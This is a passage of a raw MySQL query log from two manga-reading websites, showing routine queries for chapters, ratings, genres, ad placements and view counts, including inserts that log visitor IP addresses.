count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330652403 Quit 330652404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330652404 Quit 330652405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330652405 Quit 330652406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330652406 Quit 330652407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330652407 Quit 330652408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330652408 Quit 330652409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330652409 Quit 330652410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330652410 Quit 330652411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330652411 Quit 330652412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330652412 Quit 330652413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330652413 Quit 330652414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330652414 Quit 330652415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330652415 Quit 330652416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330652416 Quit 330652417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330652417 Quit 330652418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330652418 Quit 330652419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330652419 Quit 330652420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330652420 Quit 330652421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330652421 Quit 330652422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330652422 Quit 330652423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330652423 Quit 330652424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330652424 Quit 330652425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330652425 Quit 330652426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330652426 Quit 330652427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330652427 Quit 330652428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330652428 Quit 330652429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330652429 Quit 330652430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330652430 Quit 330652431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330652431 Quit 330652432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330652432 Quit 330652433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330652433 Quit 330652434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330652434 Quit 330652435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330652435 Quit 330652436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330652436 Quit 330652437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330652437 Quit 330652438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330652438 Quit 330652439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330652439 Quit 330652440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330652440 Quit 330652441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330652441 Quit 330652442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330652442 Quit 330652443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330652443 Quit 330652444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330652444 Quit 330652445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330652445 Quit 330652446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330652446 Quit 330652447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330652447 Quit 330652448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330652448 Quit 330652449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330652449 Quit 330652450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330652450 Quit 330652451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330652451 Quit 330652452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330652452 Quit 330652453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330652453 Quit 260225 19:29:23 330652454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652454 Quit 330652455 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10913' 330652455 Quit 330652456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652456 Query select * FROM chapters where id = '10913' 330652456 Quit 330652457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652457 Query select * FROM chapters where manga_id = '197' order by id desc 330652457 Quit 330652458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652458 Query Update chapters set view=view+1 where id = '10913' 330652458 Quit 330652459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652459 Query select * FROM chapters where id = '10913' 330652459 Quit 330652460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652460 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10913' 330652460 Quit 330652461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652461 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '10913', '139.47.119.201', 'mangacherri.com', '2026-02-26 03:29:23', '2026-02-26 03:29:23') 330652461 Quit 330652462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652462 Query select * FROM chapter_images where chapter_id = '10913' 330652462 Quit 330652463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652463 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330652463 Quit 330652464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652464 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330652465 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652466 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652466 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330652465 Quit 330652466 Quit 330652467 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652467 Query select * FROM chapters where manga_id = '193' order by id desc 330652467 Quit 330652468 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652468 Query SELECT * FROM chapter_images WHERE chapter_id = 12929 330652468 Quit 330652469 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652470 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652469 Quit 330652470 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330652470 Quit 330652471 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652471 Query select * FROM chapters where manga_id = '193' order by id desc 330652471 Quit 330652472 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652473 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652472 Quit 330652473 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652473 Quit 330652464 Quit 330652474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652474 Quit 330652475 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652475 Quit 330652476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652476 Quit 330652477 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652477 Quit 330652478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652478 Quit 330652479 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652479 Quit 330652480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652480 Quit 330652481 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652481 Quit 330652482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652483 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330652482 Quit 330652484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652484 Quit 330652485 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2542' 330652485 Quit 330652486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652486 Query select * FROM chapters where id = '2542' 330652486 Quit 330652487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652487 Query select * FROM chapters where manga_id = '64' order by id desc 330652487 Quit 330652488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652488 Query Update chapters set view=view+1 where id = '2542' 330652488 Quit 330652489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652489 Query select * FROM chapters where id = '2542' 330652489 Quit 330652490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652490 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2542' 330652490 Quit 330652491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652491 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('64', '2542', '2405:201:300c:a0aa:f85c:fc5:4d4f:3d53', 'mangacherri.com', '2026-02-26 03:29:23', '2026-02-26 03:29:23') 330652491 Quit 330652492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652492 Query select * FROM chapter_images where chapter_id = '2542' 330652492 Quit 330652493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652493 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '64' and m.active = 1 330652493 Quit 330652494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652494 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='64' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:29:24 330652483 Quit 330652495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652495 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330652495 Quit 330652496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652496 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330652496 Quit 330652497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652497 Quit 330652498 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652498 Quit 330652499 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652500 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652499 Quit 330652500 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6091' and m.active = 1 330652500 Quit 330652501 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652501 Query select * FROM chapters where id = '6091' 330652501 Quit 330652502 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652502 Query select * FROM chapters where manga_id = '158' order by display_priority ASC, id desc 330652502 Quit 330652503 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652503 Query Update chapters set view=view+1 where id = '6091' 330652503 Quit 330652504 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652504 Query select * FROM chapters where id = '6091' 330652504 Quit 330652505 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652505 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6091' and m.active = 1 330652505 Quit 330652506 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652506 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('158', '6091', '192.12.147.71', 'mangaberri.com', '2026-02-26 03:29:24', '2026-02-26 03:29:24') 330652506 Quit 330652507 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652507 Query select * FROM chapter_images where chapter_id = '6091' 330652507 Quit 330652508 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652508 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '158' and m.active = 1 330652508 Quit 330652509 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652509 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='158' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Mystery%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330652509 Quit 330652510 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652511 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652510 Quit 330652511 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652511 Quit 330652512 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652513 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652512 Quit 330652513 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652513 Quit 330652514 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652515 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652514 Quit 330652515 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652515 Quit 330652516 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652517 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652516 Quit 330652517 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652517 Quit 330652518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652518 Quit 330652519 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330652494 Quit 330652520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652520 Quit 330652521 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652521 Quit 330652522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652523 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652523 Quit 330652522 Quit 330652524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652524 Quit 330652525 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652525 Quit 330652526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652526 Quit 330652527 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652527 Quit 330652519 Quit 330652528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652528 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330652528 Quit 330652529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652529 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330652529 Quit 330652530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652530 Quit 330652531 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652531 Quit 330652532 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652533 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652532 Quit 330652533 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12962' and m.active = 1 330652533 Quit 330652534 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652534 Query select * FROM chapters where id = '12962' 330652534 Quit 330652535 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652535 Query select * FROM chapters where manga_id = '270' order by display_priority ASC, id desc 330652535 Quit 330652536 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652536 Query Update chapters set view=view+1 where id = '12962' 330652536 Quit 330652537 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652537 Query select * FROM chapters where id = '12962' 330652538 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652537 Quit 330652538 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12962' and m.active = 1 330652538 Quit 330652539 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652539 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('270', '12962', '86.180.117.234', 'mangaberri.com', '2026-02-26 03:29:24', '2026-02-26 03:29:24') 330652539 Quit 330652540 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652540 Query select * FROM chapter_images where chapter_id = '12962' 330652540 Quit 330652541 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652541 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '270' and m.active = 1 330652541 Quit 330652542 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652542 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='270' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Manhwa/Manhua%' OR genres like '%Martial Arts%') ORDER BY RAND() limit 10 330652542 Quit 330652543 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652544 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652543 Quit 330652544 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652544 Quit 330652545 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652546 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652545 Quit 330652546 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652546 Quit 330652547 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652548 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652547 Quit 330652548 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652548 Quit 330652549 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652550 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652549 Quit 330652550 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652550 Quit 260225 19:29:25 330652551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652552 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where genres like '%Romance%') as k where latest_chapter_id > 0 330652551 Quit 330652553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652553 Quit 330652554 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12813' 330652554 Quit 330652555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652555 Query select * FROM chapters where id = '12813' 330652555 Quit 330652556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652556 Query select * FROM chapters 